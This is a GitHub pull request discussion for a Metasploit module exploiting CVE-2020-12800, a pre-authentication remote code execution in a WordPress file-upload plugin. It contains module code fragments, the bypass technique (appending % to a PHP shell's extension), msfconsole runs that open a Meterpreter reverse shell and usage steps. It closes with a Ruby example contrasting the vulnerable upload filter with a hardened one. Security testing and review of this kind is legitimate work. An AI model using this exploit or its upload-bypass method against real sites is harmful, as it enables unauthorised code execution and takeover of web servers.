Drag and Drop Multiple File Upload – Contact Form 7 pre-auth RCE CVE-2020-12800 #13545
Conversation
git mv documentation/modules/exploit/multi/http/wp_dnd_mul_file_rce.rb documentation/modules/exploit/multi/http/wp_dnd_mul_file_rce.md
    find_payload(normalize_uri(target_uri.path, 'wp-content', 'uploads', '/'), payload_name)
    # lastly, if we have a location found, trigger it
    if @payload_location
See comments about find_payload and checking the return value. I haven't looked into how/why you're using recursive searching, but you may need to check the @payload_location variable rather than the return value. It would be nice if the operator received some output if @payload_location is nil, rather than failing silently.
Hey @h00die, did you happen to make the requested changes locally? I'm not seeing any additional commits past the file name change.
Yup, I haven't had a chance to push them up yet, or get to the ones I didn't mark as resolved yet.
Pushed up what I've gotten to.
I've tested with Wordpress. Did a manual setup on Ubuntu if that's helpful.
Did you install Contact Form 7 and enable it? Typically that's the case.
Oops, I clearly need to read more carefully. Was confused by the name of the plugin. Working now, thanks!
    unless res
      fail_with(Failure::Unreachable, 'No server response')
    end

    # don't need to check for 200, since that would have triggered our payload
    if res.code != 200
      print_status('Bruteforcing for payload to trigger')
      find_payload(normalize_uri(target_uri.path, 'wp-content', 'uploads', '/'), payload_name)
      unless @payload_location
        fail_with(Failure::Unknown, 'Unable to determine uploaded shell path')
      end
      # lastly, if we have a location found, trigger it
      send_request_cgi('uri' => @payload_location)
    end
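Review bot: the `unless res` / `fail_with(Failure::Unreachable, 'No server response')` at the top of this block runs before the `res.code != 200` branch, so when the request to the well known location actually executes the uploaded shell (which, as the output below shows, returns no HTTP response once the payload has fired) the module aborts with "No server response" after the session has already opened. Guard the whole block with `unless session_created? ... end`, or check `session_created?` before treating a nil response as fatal, so a missing response only fails the run when no session exists. The comment `# dont need to check for 200, since that would have triggered our payload` also reads oddly directly above `if res.code != 200`; reword it to say that a 200 needs no further handling because the payload has already fired, and everything else falls through to the brute-force search.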
Tested with the latest changes and kept getting this output:

msf5 exploit(multi/http/wp_dnd_mul_file_rce) > run
[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Nonce: 739944da12
[+] Payload uploaded successfully
[*] Attempting to trigger at well known location
[*] Sending stage (38288 bytes) to 192.168.37.137
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.137:36722) at 2020-06-04 09:35:43 -0500
[+] Deleted 6rcEb4C8ivQI.php
[-] Exploit aborted due to failure: unreachable: No server response
[*] Exploit completed, but no session was created.

A valid session is still established, but the response is not returning back. Wrapping the highlighted logic in an unless session_created?...end block fixes this. I can go ahead and make that change while landing, as the rest of the code looks fine to me.
No issues on my side with that approach.
Test output for Wordpress
Release Notes

This adds an exploit module for the Drag and Drop Multiple File Upload - Contact Form 7 plugin for Wordpress. For versions below 1.3.4, the file upload security filter can be bypassed by appending a
Hi, I am trying this exploit module with Wordpress 5.4, drag-and-drop plugin 1.3.3.2 and Contact Form 7 plugin version 5.1.9. Both these plugins are activated. Yet while executing the module, the error I am getting is: [*] Getting nonce. Can someone tell me what mistake I am making?
Check your URI is set correctly.
I checked it. It is /wordpress5.4. This is my URI. I tried it on both Linux and Windows targets. The result is the same.
Without httptrace it's hard to tell about that specific configuration.
Here's my httptrace output:

msf5 exploit(multi/http/wp_dnd_mul_file_rce) > exploit
[*] Started reverse TCP handler on 192.168.36.132:4444
Request:
####################
####################
Response:
####################
Moved Permanently
The document has moved here.
[-] Exploit aborted due to failure: unexpected-reply: Non-200 response, check targeturi

Set URI to
Anything else, send me a message on Slack to further help.
Adds a pre-auth RCE for Wordpress with Drag and Drop Multiple File Upload – Contact Form 7 installed.
Pretty straightforward exploit: append a % on the file extension to bypass the filter, upload a PHP shell, call it, and call it a day.
@amartinsec wrote in his POC a recursive folder searcher to find the shellcode. I asked them about this, and they mentioned that while there is most likely a known location for the shell, it's possible that older versions may have saved files elsewhere. So we trigger the known location, and if no shell is found we fall back to the recursive search.
based on the work of @amartinsec
Verification
Install the vulnerable plugin (mega link provided) and Contact Form 7 (get it from the Wordpress plugin store/search).
msfconsole
use exploits/multi/http/wp_dnd_mul_file_rce
set rhosts [ip]
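The filter bypass the PR description summarises ("append a % on the file extension to bypass the filter"), as an added Ruby illustration that is not the plugin's code and not the Metasploit module's code. It models a blocklist that inspects the extension of the upload name exactly as submitted, followed by a sanitiser that strips characters such as % when the file is written, so shell.php% passes the check and lands on disk as shell.php. The blocklist, the allowlist and the sanitize_file_name helper here are assumptions made for this example; the hardened variant sanitises first and then allowlists the extension of the name that will actually be stored.

```ruby
# Added example, not code from the plugin or from the Metasploit module.
# Models the bypass described in the PR: a blocklist compared against the
# extension of the submitted name, followed by a sanitiser that drops the
# trailing "%" when the file is written. Both lists and the sanitiser are
# assumptions made for this illustration.

BLOCKED_EXTENSIONS = %w[php phtml php3 php4 php5 phar].freeze # assumed blocklist
ALLOWED_EXTENSIONS = %w[jpg jpeg png gif pdf txt].freeze      # assumed allowlist

# Assumed sanitiser: anything outside [A-Za-z0-9._-] is removed, which is
# what turns "shell.php%" into "shell.php" on disk.
def sanitize_file_name(name)
  name.gsub(/[^A-Za-z0-9._-]/, '')
end

# Extension of a name, lowercased and without the dot ("" when there is none).
# File.extname("shell.php%") is ".php%", so the "%" stays part of the extension.
def extension_of(name)
  ext = File.extname(name)
  ext.empty? ? '' : ext[1..-1].downcase
end

# Vulnerable filter: the blocklist is checked against the extension of the
# name as submitted. "shell.php%" has extension "php%", which is not listed,
# so it is accepted and then stored under the sanitised name "shell.php".
def vulnerable_upload(name)
  return [:rejected, nil] if BLOCKED_EXTENSIONS.include?(extension_of(name))

  [:stored, sanitize_file_name(name)]
end

# Hardened filter: sanitise first, then decide on the name that will actually
# be stored, using an allowlist and refusing names with more than one dot so
# that "shell.php.jpg"-style names are not accepted either.
def hardened_upload(name)
  stored = sanitize_file_name(name)
  return [:rejected, nil] if stored.count('.') != 1
  return [:rejected, nil] unless ALLOWED_EXTENSIONS.include?(extension_of(stored))

  [:stored, stored]
end

# Run both filters over a set of constructed upload names and return the rows.
def compare_filters(names)
  names.map { |n| { name: n, vulnerable: vulnerable_upload(n), hardened: hardened_upload(n) } }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample names: a benign image, a plain shell, the "%" trick
  # and a double-extension variant.
  compare_filters(%w[photo.jpg shell.php shell.php% shell.php.jpg]).each do |row|
    puts format('%-14s vulnerable=%-22s hardened=%s',
                row[:name], row[:vulnerable].inspect, row[:hardened].inspect)
  end
end
```

The point to take from the two functions is the ordering: any check that runs on the submitted name rather than on the name that will be written to disk can be defeated by a character the storage step later removes, which is why the hardened version normalises first and only then consults an allowlist.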